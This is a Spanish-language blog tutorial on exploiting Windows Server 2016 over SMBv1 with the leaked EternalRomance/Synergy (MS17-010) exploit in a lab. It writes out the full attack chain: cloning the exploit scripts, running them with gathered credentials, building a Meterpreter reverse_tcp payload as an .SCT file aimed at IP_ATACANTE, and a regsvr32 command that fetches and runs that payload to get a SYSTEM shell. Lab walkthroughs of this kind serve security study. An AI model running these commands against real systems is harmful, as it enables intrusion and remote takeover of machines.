Post67 nn

Explotando Windows 2016 con EternalRomance/Synergy (NSA)


Foto
Andres Galeano

Como hemos comentado en post anteriores (Usando el exploit eternalblue de la NSA , Explotando Windows 2012 R2 con EternalBlue), los exploits desarrollados por la NSA, que se filtraron gracias al grupo Shadow Brokers, tuvieron mucho revuelo, ya que se aprovechaban de una vulnerabilidad situada en el protocolo SMBv1. Dicha vulnerabilidad fue utilizada por diversos tipos de Ransomwares (Wannacry) o Wipers (ExPetr/Petya/NotPetya).


Imagen 1 - Ransomware Wanna Cry

 

Imagen 2 - Wyper Petya

 

Como era de esperarse estos exploits siguieron siendo investigados, por diversos reverse engineers, uno de ellos es Sleepya, él había realizado anteriormente scripts que servían para explotar diversos Windows, en esta oportunidad sumó a su colección Windows 2016 (x64) y mejoró el rate de explotación(ver aquí), .

Ante esta noticia, una vez más Sheila Berta, se puso manos a la obra y realizó un paper (ver aquí) para demostrar cómo puede ser utilizado.

En esta ocasión vamos a demostrar rápidamente como funciona el script, para un nivel más detallado pueden ver los papers anteriormente nombrados y estos links de referencia:

:

Laboratorio

Para que podamos llevar a cabo la practica de manera sencilla, vamos a necesitar una maquina virtual con Kali 2017.1, y otra con un Windows 2016 (x64).


Imagen 3 - Windows 2016

La vulnerabilidad puede ser explotada en el caso de que esté activo el usuario Guest o bien hayamos recopilado previamente las credenciales de un usuario válido, aunque tenga permisos reducidos nos servirá, ya que una vez explotada la vulnerabilidad, siempre recibiremos una terminal de SYSTEM.


Ejemplo n° 1 (Archivo Txt)

Aquí vamos a demostrar rápidamente como se puede escribir un archivo de texto en el host víctima.

Primero deberemos descargar la carpeta donde se encuentran los scripts de Sleepya.


git clone https://github.com/worawit/MS17-010/

Imagen 4 - Descargar carpeta MS17-010

 

Entramos a la carpeta MS17-010 y allí creamos el archivo exploit.py con el codigo que figura en: https://www.exploit-db.com/exploits/42315/ (aunque por lo que estuve viendo el script zzz_exploit.py cumple con la misma función y tiene más líneas de código, donde se pueden ver algunos comentarios interesantes sobre el funcionamiento del script)



Imagen 5 - Creación de archivo exploit.py


Una vez creado el archivo, ingresamos y cargamos las credenciales que hayamos recopilado.


Imagen 6 - Ingreso de credenciales

 

Imagen 7 - Ejecución del exploit



Imagen 8 - Resultado: archivo pwned.txt creado

 

Ejemplo n° 2 (Meterpreter Shell)


A estas alturas ya podemos notar que hay muchas maneras de conseguir una shell, y terminar de comprometer el host, todo dependerá de nuestra imaginación.

Sheila en esta oportunidad nos ofrece la posibilidad de embeber una shellcode en un archivo .SCT.

El mismo deberá ser creado con Ps1encode, esta herramienta nos permite generar y codificar los PAYLOADS de metasploit en varios formatos basado en PowerShell.

(Leer los links de Referencia anteriormente mencionados)

 

Creación del PAYLOAD (Archivo SCT)

 

Descargar la herramienta PS1encode

 
git clone https://github.com/CroweCybersecurity/ps1encode
 

Crear el archivo SCT

 
ruby ps1encode.rb --PAYLOAD windows/meterpreter/reverse_tcp --LHOST=IP_ATACANTE -- LPORT=4444 -t sct

Imagen 9 - Creación de archivo sct


Copiar el archivo index.sct en /var/www/html, dar los permisos necesarios y luego iniciar el servidor web apache2.

 
cp index.sct /var/www/html/

chmod +x index.sct

service apache2 start
 

Modificar exploit.py


Imagen 10 - exploit.py original

 

Cargar en el script:

regsvr32 /s /n /u /i:http://IP_ATACANTE/index.sct scrobj.dll


Imagen 11 - exploit.py modificado


Crear un Handler

 


Imagen 12 - Carga del Handler

EXPLOTAR

 

Imagen 13 - Meterpreter con permisos SYSTEM

 

Como podemos ver es una excelente manera de ejecutar un archivo de manera remota y conseguir una shell con permisos SYSTEM.

Recuerden que para profundizar más en el tema pueden leer todos los papers.

Los seguiremos manteniendo al tanto!



Artículos que te pueden interesar


El siguiente tutorial sirve para implementar diversos comandos de pentesting para utilizar como herramientas colaborativas en este caso Slack. E... José Moreno


Continuar Leyendo

Hace unos dias los creadores de Kali Linux han lanzado la nueva version de su sistema operativo que podemos encontrar desde el siguiente enlace ... Omar Jacobo Muñoz Veliz


Continuar Leyendo

Pasos para resolver Servmon Hack The Box.Nmap Scan Enumerate FTP Enumerate Web Pages Exploit to NVMS-1000 (CVE : 2019–2085) Local Port Forwa... Elzer Pineda


Continuar Leyendo